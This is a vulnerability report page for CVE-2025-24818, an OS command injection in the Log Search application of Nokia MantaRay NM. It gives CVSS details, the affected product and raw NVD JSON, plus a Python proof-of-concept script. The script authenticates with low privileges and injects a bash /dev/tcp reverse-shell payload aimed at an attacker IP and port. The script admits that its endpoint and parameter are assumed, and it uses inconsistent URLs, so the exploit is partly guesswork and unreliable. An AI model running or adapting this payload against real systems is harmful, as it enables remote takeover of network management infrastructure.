Security Vulnerability Report
中文
CVE-2025-24818 CVSS 8.0 HIGH

CVE-2025-24818

Published: 2026-04-07 16:16:23
Last Modified: 2026-04-22 18:54:41
Source: b48c3b8f-639e-4c16-8725-497bc411dad0

Description

Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application.

CVSS Details

CVSS Score
8.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:* - VULNERABLE
Nokia MantaRay NM (具体受影响版本请参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2025-24818 (OS Command Injection in Nokia MantaRay NM) # This script demonstrates the vulnerability by sending a malicious payload to the Log Search endpoint. import requests import sys # Configuration TARGET_URL = "https://<TARGET_IP>/log_search_endpoint" # Replace with actual endpoint ATTACKER_IP = "192.168.1.100" ATTACKER_PORT = 4444 def exploit(target_ip, username, password): session = requests.Session() # 1. Authenticate to get a valid session (Low privilege required) login_url = f"{target_ip}/login" login_data = {"username": username, "password": password} session.post(login_url, data=login_data, verify=False) # 2. Craft the OS Command Injection payload # Attempting to execute a reverse shell using bash # The vulnerable parameter is assumed to be 'search_term' payload = f"; /bin/bash -c 'bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1'" # 3. Send the request to the vulnerable Log Search application exploit_url = f"{target_ip}/api/log/search" params = { "query": payload, "module": "system" } try: print(f"[*] Sending payload to {exploit_url}...") response = session.get(exploit_url, params=params, verify=False, timeout=5) print(f"[*] Response status: {response.status_code}") print("[*] Check your netcat listener for a shell connection.") except Exception as e: print(f"[-] Exploit failed: {e}") if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_ip> <username> <password>") sys.exit(1) exploit(sys.argv[1], sys.argv[2], sys.argv[3])

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-24818", "sourceIdentifier": "b48c3b8f-639e-4c16-8725-497bc411dad0", "published": "2026-04-07T16:16:22.813", "lastModified": "2026-04-22T18:54:40.833", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.1, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nokia:mantaray_nm:*:*:*:*:*:*:*:*", "versionEndExcluding": "25r1-nm", "matchCriteriaId": "C678CD07-A42D-4168-8852-9C232E8DA11B"}]}]}], "references": [{"url": "https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/", "source": "b48c3b8f-639e-4c16-8725-497bc411dad0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.